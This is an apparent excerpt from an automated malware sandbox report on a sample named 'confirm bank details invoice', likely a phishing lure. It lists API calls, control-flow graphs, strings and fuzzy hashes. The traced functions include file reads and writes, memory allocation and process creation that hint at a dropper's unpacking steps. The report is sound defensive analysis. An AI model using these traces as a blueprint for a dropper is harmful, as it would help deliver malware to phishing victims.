                      • Part of subcall function 00497CF4: EnterCriticalSection.KERNEL32(00000000,?,00497ADD,0000000D), ref: 00497D1F
                    • __calloc_crt.LIBCMT ref: 0049ACD2
                      • Part of subcall function 00496986: __calloc_impl.LIBCMT ref: 00496995
                      • Part of subcall function 00496986: Sleep.KERNEL32(00000000,000003BC,0048F507,?,0000000E), ref: 004969AC
                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 0049ACED
                    • GetStartupInfoW.KERNEL32(?,00526E28,00000064,00495E91,00526C70,00000014), ref: 0049AD46
                    • __calloc_crt.LIBCMT ref: 0049AD91
                    • GetFileType.KERNEL32(00000001), ref: 0049ADD8
                    • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0049AE11
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                    • String ID:
                    • API String ID: 1426640281-0
                    • Opcode ID: 5f81094e6d6ac361f25b1ba00d695876321636ff470af10975d06a0701f04012
                    • Instruction ID: 3d23bcc5cb87a5500d4408298a73b2d5572858e1d4b33d600e0fd20b5b08157f
                    • Opcode Fuzzy Hash: 5f81094e6d6ac361f25b1ba00d695876321636ff470af10975d06a0701f04012
                    • Instruction Fuzzy Hash: 0081C2719053558FDF14CF68C8845AABFF1AF05324B24427EE4A6AB3D1C7389813CB9A
                    Function 01340648 Relevance: 10.7, APIs: 7, Instructions: 151fileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1139 1340648-134069a call 1340548 CreateFileW 1142 13406a3-13406b0 1139->1142 1143 134069c-134069e 1139->1143 1146 13406b2-13406be 1142->1146 1147 13406c3-13406da VirtualAlloc 1142->1147 1144 13407fc-1340800 1143->1144 1146->1144 1148 13406e3-1340709 CreateFileW 1147->1148 1149 13406dc-13406de 1147->1149 1151 134072d-1340747 ReadFile 1148->1151 1152 134070b-1340728 1148->1152 1149->1144 1153 1340749-1340766 1151->1153 1154 134076b-134076f 1151->1154 1152->1144 1153->1144 1155 1340790-13407a7 WriteFile 1154->1155 1156 1340771-134078e 1154->1156 1158 13407d2-13407f7 CloseHandle VirtualFree 1155->1158 1159 13407a9-13407d0 1155->1159 1156->1144 1158->1144 1159->1144
                    APIs
                    • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0134068D
                    Memory Dump Source
                    • Source File: 00000000.00000002.2167173105.000000000133F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0133F000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_133f000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                    • Instruction ID: 55b6b195f81e1e7d680fa70e57273b08981d29e0e125bd257a5283f96b0af14a
                    • Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                    • Instruction Fuzzy Hash: B8510875B50208FBEF24DFA4CC49FEE7BB8AF48714F108554F71AEA180DA74A6448B60
                    Function 004749FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73registryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1169 4749fb-474a25 call 47bcce RegOpenKeyExW 1172 4e41cc-4e41e3 RegQueryValueExW 1169->1172 1173 474a2b-474a2f 1169->1173 1174 4e4246-4e424f RegCloseKey 1172->1174 1175 4e41e5-4e4222 call 48f4ea call 4747b7 RegQueryValueExW 1172->1175 1180 4e423d-4e4245 call 4747e2 1175->1180 1181 4e4224-4e423b call 476a63 1175->1181 1180->1174 1181->1180
                    APIs
                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00474A1D
                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 004E41DB
                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 004E421A
                    • RegCloseKey.ADVAPI32(?), ref: 004E4249
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: QueryValue$CloseOpen
                    • String ID: Include$Software\AutoIt v3\AutoIt
                    • API String ID: 1586453840-614718249
                    • Opcode ID: 4c3b1b12d051afc2dc96ad8e86b0fd7e015765ce34a9abe1d9e051bf4268b74b
                    • Instruction ID: 62ac2336300a2d15db588f556fa428db226fdbe2af275720d5ab33eaf81a8a78
                    • Opcode Fuzzy Hash: 4c3b1b12d051afc2dc96ad8e86b0fd7e015765ce34a9abe1d9e051bf4268b74b
                    • Instruction Fuzzy Hash: 82113D71A00109BFEB04ABA5CD86DFF7BBCEF44348F00406AB506D6191EB759E05D768
                    Function 004736B8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1196 4736b8-473728 CreateWindowExW * 2 ShowWindow * 2
                    APIs
                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 004736E6
                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00473707
                    • ShowWindow.USER32(00000000,?,?,?,?,00473AA3,?), ref: 0047371B
                    • ShowWindow.USER32(00000000,?,?,?,?,00473AA3,?), ref: 00473724
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Window$CreateShow
                    • String ID: AutoIt v3$edit
                    • API String ID: 1584632944-3779509399
                    • Opcode ID: f33d3d7a9ea3ad3ab2121b0cf060fdd454c9b96bb9447f3fa001ce71684a8ca7
                    • Instruction ID: fb3fe256dfc55542bb23a1027339f86e2f15ec6d5d148948bb36fb72e8fa6fa8
                    • Opcode Fuzzy Hash: f33d3d7a9ea3ad3ab2121b0cf060fdd454c9b96bb9447f3fa001ce71684a8ca7
                    • Instruction Fuzzy Hash: 95F0D071A406D47BD73557676C4CE772E7ED7D6F20B00401ABA04972A0C6650899EAB8
                    Function 00474A30 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 138COMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                      • Part of subcall function 00475374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00531148,?,004761FF,?,00000000,00000001,00000000), ref: 00475392
                      • Part of subcall function 004749FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00474A1D
                    • _wcscat.LIBCMT ref: 004E2D80
                    • _wcscat.LIBCMT ref: 004E2DB5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: _wcscat$FileModuleNameOpen
                    • String ID: 8!S$\$\Include\
                    • API String ID: 3592542968-3708070565
                    • Opcode ID: 32064c9d60affcbafe64fa5a8e732c664ab2b169bcf3fa765d1e869ada7aed94
                    • Instruction ID: 1bce59ee6212c67b7ed9206d73ba84010ca981adc96c135045d43c3d43dabc0e
                    • Opcode Fuzzy Hash: 32064c9d60affcbafe64fa5a8e732c664ab2b169bcf3fa765d1e869ada7aed94
                    • Instruction Fuzzy Hash: 12515E714047409BC714EF56EA818AAB7F8FF69304F40852FF64993360EB78990CDB5A
                    Function 004751AF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 0047522F
                    • _wcscpy.LIBCMT ref: 00475283
                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00475293
                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 004E3CB0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: IconLoadNotifyShell_String_memset_wcscpy
                    • String ID: Line:
                    • API String ID: 1053898822-1585850449
                    • Opcode ID: da965d1fd71c0a7956974fcd7076077584ce5ce1258d9a9357a7ed44f5d3d6f4
                    • Instruction ID: badedc31f6889291ab01af31bd8dead38d422d2eb2c6027e77ee2e83e21a7c1b
                    • Opcode Fuzzy Hash: da965d1fd71c0a7956974fcd7076077584ce5ce1258d9a9357a7ed44f5d3d6f4
                    • Instruction Fuzzy Hash: 2D31C171408B406FD320EB61EC46BDB77D8AB44314F00891FF58D9A192DBB8A548CB9E
                    Function 00474139 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 258COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004741A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,004739FE,?,00000001), ref: 004741DB
                    • _free.LIBCMT ref: 004E36B7
                    • _free.LIBCMT ref: 004E36FE
                      • Part of subcall function 0047C833: __wsplitpath.LIBCMT ref: 0047C93E
                      • Part of subcall function 0047C833: _wcscpy.LIBCMT ref: 0047C953
                      • Part of subcall function 0047C833: _wcscat.LIBCMT ref: 0047C968
                      • Part of subcall function 0047C833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0047C978
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                    • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                    • API String ID: 805182592-1757145024
                    • Opcode ID: cd6a117ee93b172fe8ff869b9a94b73b3d8c7a46900e6cfef694d3a865fedeb3
                    • Instruction ID: 68cb2c86ea38f12b6cae73b16a21e0e1e0211e574e6cbf79c66564fffc5ddf79
                    • Opcode Fuzzy Hash: cd6a117ee93b172fe8ff869b9a94b73b3d8c7a46900e6cfef694d3a865fedeb3
                    • Instruction Fuzzy Hash: 02918171910259AFCF15EFA6CC859EEB7B4BF08315F00442FF416A7291DB38AA05CB68
                    Function 013420F8 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 159fileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 01341FE8: Sleep.KERNELBASE(000001F4), ref: 01341FF9
                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01342240
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2167173105.000000000133F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0133F000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_133f000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: CreateFileSleep
                    • String ID: QQM75G7XDPKLRE709AG
                    • API String ID: 2694422964-789174097
                    • Opcode ID: 578780f9178a9aecb5bfb97db61c67ed1bc86ab75b0c9773c332d940c03c0a81
                    • Instruction ID: 11be02b79d0dfd12b4fbd1ecd260e93a2a98d9f432501382b20c6383e1ebc49b
                    • Opcode Fuzzy Hash: 578780f9178a9aecb5bfb97db61c67ed1bc86ab75b0c9773c332d940c03c0a81
                    • Instruction Fuzzy Hash: F0619F70D14248DBEF11DBA4D854BEFBBB9AF18304F004199E608BB2C1D77A5B49CBA5
                    Function 004740E5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 004E3725
                    • GetOpenFileNameW.COMDLG32 ref: 004E376F
                      • Part of subcall function 0047660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004753B1,?,?,004761FF,?,00000000,00000001,00000000), ref: 0047662F
                      • Part of subcall function 004740A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 004740C6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Name$Path$FileFullLongOpen_memset
                    • String ID: X$t3R
                    • API String ID: 3777226403-3286752794
                    • Opcode ID: 7387efb0339e42cce88fd447ec7a6d1bc3faa22418ebffe7b9bf1bbdf80821f3
                    • Instruction ID: 207a9a5eb5118050d29b0e65f36cb5e7e8c371c2b4f95687c7c5ab7b0a1c105d
                    • Opcode Fuzzy Hash: 7387efb0339e42cce88fd447ec7a6d1bc3faa22418ebffe7b9bf1bbdf80821f3
                    • Instruction Fuzzy Hash: 3F21C971A101989FCF01DF95D8457EE7BF99F89304F00805AE408A7281DBB85689CF59
                    Function 004934AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                    Download Yara Rule
                    APIs
                    • __getstream.LIBCMT ref: 004934FE
                      • Part of subcall function 00497C0E: __getptd_noexit.LIBCMT ref: 00497C0E
                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 00493539
                    • __wopenfile.LIBCMT ref: 00493549
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                    • String ID: <G
                    • API String ID: 1820251861-2138716496
                    • Opcode ID: e4f40ac35d11377e6d390c9af55a0eb9bfd374ec3f682348050fcb2ab3494899
                    • Instruction ID: 037740784d9766ba4a09bde4624700851dc101cca4b4bfdd72dd7b7b348a1417
                    • Opcode Fuzzy Hash: e4f40ac35d11377e6d390c9af55a0eb9bfd374ec3f682348050fcb2ab3494899
                    • Instruction Fuzzy Hash: 94110D70900215AFDF11BF729C4266F3EA4AF46764B16853BE415C7281EB3CCE0197A9
                    Function 0048D298 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                    Download Yara Rule
                    APIs
                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0048D28B,SwapMouseButtons,00000004,?), ref: 0048D2BC
                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,0048D28B,SwapMouseButtons,00000004,?,?,?,?,0048C865), ref: 0048D2DD
                    • RegCloseKey.KERNELBASE(00000000,?,?,0048D28B,SwapMouseButtons,00000004,?,?,?,?,0048C865), ref: 0048D2FF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: CloseOpenQueryValue
                    • String ID: Control Panel\Mouse
                    • API String ID: 3677997916-824357125
                    • Opcode ID: 6a74bebe94491a83f7a6affb00672fb9923ccf839c6ac15d5084a19dc25030e3
                    • Instruction ID: 1a699cc5acbc6330a63021e8148647587a6ec1e5e70a3bf24a4fde08716a0e2e
                    • Opcode Fuzzy Hash: 6a74bebe94491a83f7a6affb00672fb9923ccf839c6ac15d5084a19dc25030e3
                    • Instruction Fuzzy Hash: 70113C75A12208BFDB20AF64CC84EAF7BB8EF44754F10486AF805D7250D6359E41DB69
                    Function 004BC396 Relevance: 6.2, APIs: 4, Instructions: 154COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00474517: _fseek.LIBCMT ref: 0047452F
                      • Part of subcall function 004BC56D: _wcscmp.LIBCMT ref: 004BC65D
                      • Part of subcall function 004BC56D: _wcscmp.LIBCMT ref: 004BC670
                    • _free.LIBCMT ref: 004BC4DD
                    • _free.LIBCMT ref: 004BC4E4
                    • _free.LIBCMT ref: 004BC54F
                      • Part of subcall function 00491C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00497A85), ref: 00491CB1
                      • Part of subcall function 00491C9D: GetLastError.KERNEL32(00000000,?,00497A85), ref: 00491CC3
                    • _free.LIBCMT ref: 004BC557
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                    • String ID:
                    • API String ID: 1552873950-0
                    • Opcode ID: 2db9d723d2f1f24614347a7e6fc8c80c315d14cd5ac174f49895e1fbecc6b5fc
                    • Instruction ID: c0e1fe5465827434153b298b39c13922f63295e7ac5e3a760452db9ff3c9e12f
                    • Opcode Fuzzy Hash: 2db9d723d2f1f24614347a7e6fc8c80c315d14cd5ac174f49895e1fbecc6b5fc
                    • Instruction Fuzzy Hash: 5A516FB1904219AFDF249F65DC81BEDBBB9EF48304F1040AEB21DA3251DB755A808F69
                    Function 0048EB83 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 0048EBB2
                      • Part of subcall function 004751AF: _memset.LIBCMT ref: 0047522F
                      • Part of subcall function 004751AF: _wcscpy.LIBCMT ref: 00475283
                      • Part of subcall function 004751AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00475293
                    • KillTimer.USER32(?,00000001,?,?), ref: 0048EC07
                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0048EC16
                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 004E3C88
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                    • String ID:
                    • API String ID: 1378193009-0
                    • Opcode ID: fefd59608fb89d167a5f865937ada47da9e67b2449083e15cb75982931fd6b1e
                    • Instruction ID: 0efd38d9f807c16dc1b98e3f32a63201cfb1080fb74c0286240d782b30e9167f
                    • Opcode Fuzzy Hash: fefd59608fb89d167a5f865937ada47da9e67b2449083e15cb75982931fd6b1e
                    • Instruction Fuzzy Hash: 6E21DA719047849FE7339B398859BEBBBEC9F01309F14045EE68E57241C3786A85CB5A
                    Function 01340D28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41processCOMMON
                    Download Yara Rule
                    APIs
                    • CreateProcessW.KERNELBASE(?,00000000), ref: 01340D6D
                    • ExitProcess.KERNEL32(00000000), ref: 01340D8C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2167173105.000000000133F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0133F000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_133f000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Process$CreateExit
                    • String ID: D
                    • API String ID: 126409537-2746444292
                    • Opcode ID: 8e3ba9fc2c51f8adf90e9822168422d2e6d76900810f8c5233ba2e98edbc58fa
                    • Instruction ID: 22aa0c3149c86d3c66eb04f496ddd128631d871830ede8f03a1b100ab4e603c0
                    • Opcode Fuzzy Hash: 8e3ba9fc2c51f8adf90e9822168422d2e6d76900810f8c5233ba2e98edbc58fa
                    • Instruction Fuzzy Hash: 3AF0FF7254024CABDB64EFE4CC49FEE77BCBF04705F408508FB5A9A180DA74A6088B61
                    Function 004BC71A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                    Download Yara Rule
                    APIs
                    • GetTempPathW.KERNEL32(00000104,?), ref: 004BC72F
                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 004BC746
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Temp$FileNamePath
                    • String ID: aut
                    • API String ID: 3285503233-3010740371
                    • Opcode ID: f5cf406750d43d096f995ed72f72e31d24a03a112a45109f8efc4c07f770f57b
                    • Instruction ID: b13ec9b781ee2d633c2e6197b56fe3c2c293f39dd9675ffbda152d5a7ea4439f
                    • Opcode Fuzzy Hash: f5cf406750d43d096f995ed72f72e31d24a03a112a45109f8efc4c07f770f57b
                    • Instruction Fuzzy Hash: 6FD05E7190030EABDB10AB90EC0EF9A7B6CAB00704F0001A07690E50F1DAB5E6A9CB99
                    Function 004CF8AE Relevance: 4.9, APIs: 3, Instructions: 385COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 14c6df8f4bee8a81936ad6308a069195bbd70f8fa0044cc8973fb5c459a487c5
                    • Instruction ID: 0478d551f2fbe18a94f76c601c32ba7cb382c3e544ada785583b931e61519bdb
                    • Opcode Fuzzy Hash: 14c6df8f4bee8a81936ad6308a069195bbd70f8fa0044cc8973fb5c459a487c5
